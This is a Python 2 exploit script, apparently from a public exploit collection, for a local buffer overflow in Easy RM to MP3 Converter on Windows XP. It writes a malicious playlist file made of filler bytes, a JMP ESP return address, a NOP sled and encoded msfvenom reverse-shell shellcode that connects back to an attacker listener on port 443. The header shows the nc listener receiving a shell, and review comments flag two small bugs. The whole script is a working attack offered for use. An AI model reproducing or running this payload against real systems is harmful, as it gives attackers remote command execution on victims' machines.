#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Easy RM to MP3 Converter Exploit - Local Buffer Overflow
#
# How I tested it:
# - Windows XP SP2 (Metasploitable will do) and Kali.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe
# - pattern_create.rb and pattern_offset.rb = 26100
# - Badchars = \x00\x09\x0a
# - Return Address found at 0x7c941eed (JMP ESP) | C:\Arquivos de programas\Easy RM to MP3 Converter\MSRMfilter03.dll
# - Generated the payload using msfvenom
#
# PoC:
# Windows XP:
# C:\Python27>python.exe exploit-easyrmtomp3converter.py
# C:\Python27>
# - Easy RM to MP3 Converter, click on "Load", and select C:\Python27\evil.m3u
# Kali:
# root@kali:~# nc -nlvp 443
# listening on [any] 443 ...connect to [10.0.0.36] from (UNKNOWN) [10.0.0.45] 1083
# Microsoft Windows XP [versao 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Arquivos de programas\Easy RM to MP3 Converter>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
# Name of the playlist file this script produces; it is written to the
# current working directory by the open() call at the bottom.
filename = "evil.m3u"
# Little-endian encoding of 0x7c941eed, the JMP ESP address recorded in the
# header comment. It was found in MSRMfilter03.dll on the tested install and
# is not expected to be valid for any other build of that DLL.
eip = "\xed\x1e\x94\x7c"
# 100 bytes of 0x90 (x86 NOP) placed directly after the return address.
nops = "\x90"*100
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a"
# Payload size: 351 bytes
# Opaque encoded payload emitted by the msfvenom command above (size as stated
# in that comment); the bytes are left exactly as generated.
shellcode = ("\xba\x9b\x9c\xbb\x42\xd9\xf6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\xcd\x92\x59\xb7\x0d\x42\x1f"
"\x38\xed\x93\x40\xb0\x08\xa2\x40\xa6\x59\x95\x70\xac\x0f\x1a"
"\xfa\xe0\xbb\xa9\x8e\x2c\xcc\x1a\x24\x0b\xe3\x9b\x15\x6f\x62"
"\x18\x64\xbc\x44\x21\xa7\xb1\x85\x66\xda\x38\xd7\x3f\x90\xef"
"\xc7\x34\xec\x33\x6c\x06\xe0\x33\x91\xdf\x03\x15\x04\x6b\x5a"
"\xb5\xa7\xb8\xd6\xfc\xbf\xdd\xd3\xb7\x34\x15\xaf\x49\x9c\x67"
"\x50\xe5\xe1\x47\xa3\xf7\x26\x6f\x5c\x82\x5e\x93\xe1\x95\xa5"
"\xe9\x3d\x13\x3d\x49\xb5\x83\x99\x6b\x1a\x55\x6a\x67\xd7\x11"
"\x34\x64\xe6\xf6\x4f\x90\x63\xf9\x9f\x10\x37\xde\x3b\x78\xe3"
"\x7f\x1a\x24\x42\x7f\x7c\x87\x3b\x25\xf7\x2a\x2f\x54\x5a\x23"
"\x9c\x55\x64\xb3\x8a\xee\x17\x81\x15\x45\xbf\xa9\xde\x43\x38"
"\xcd\xf4\x34\xd6\x30\xf7\x44\xff\xf6\xa3\x14\x97\xdf\xcb\xfe"
"\x67\xdf\x19\x50\x37\x4f\xf2\x11\xe7\x2f\xa2\xf9\xed\xbf\x9d"
"\x1a\x0e\x6a\xb6\xb1\xf5\xfd\xb3\x45\xf5\xd9\xab\x47\xf5\x20"
"\x97\xc1\x13\x48\xf7\x87\x8c\xe5\x6e\x82\x46\x97\x6f\x18\x23"
"\x97\xe4\xaf\xd4\x56\x0d\xc5\xc6\x0f\xfd\x90\xb4\x86\x02\x0f"
"\xd0\x45\x90\xd4\x20\x03\x89\x42\x77\x44\x7f\x9b\x1d\x78\x26"
"\x35\x03\x81\xbe\x7e\x87\x5e\x03\x80\x06\x12\x3f\xa6\x18\xea"
"\xc0\xe2\x4c\xa2\x96\xbc\x3a\x04\x41\x0f\x94\xde\x3e\xd9\x70"
"\xa6\x0c\xda\x06\xa7\x58\xac\xe6\x16\x35\xe9\x19\x96\xd1\xfd"
"\x62\xca\x41\x01\xb9\x4e\x71\x48\xe3\xe7\x1a\x15\x76\xba\x46"
"\xa6\xad\xf9\x7e\x25\x47\x82\x84\x35\x22\x87\xc1\xf1\xdf\xf5"
"\x5a\x94\xdf\xaa\x5b\xbd")
# File layout: 26100 filler bytes (the offset from the header), the 4-byte
# return address, the NOP sled, the payload, then trailing "C" padding.
# NOTE(review): the padding expression subtracts the filler, address and sled
# lengths but not len(shellcode), so the file is 30000 + len(shellcode) bytes
# long rather than the 30000 the expression appears to target.
buffer = "A"*26100 + eip + nops + shellcode + "C"*(30000-26100-4-100)
# Python 2 only (see the shebang and the C:\Python27 paths in the header):
# the literals above are byte strings, so text mode writes them verbatim.
textfile = open(filename, 'w')
textfile.write(buffer)
# BUG: missing "()" -- this evaluates the bound method without calling it, so
# the file is never explicitly closed and is only flushed at interpreter exit.
textfile.close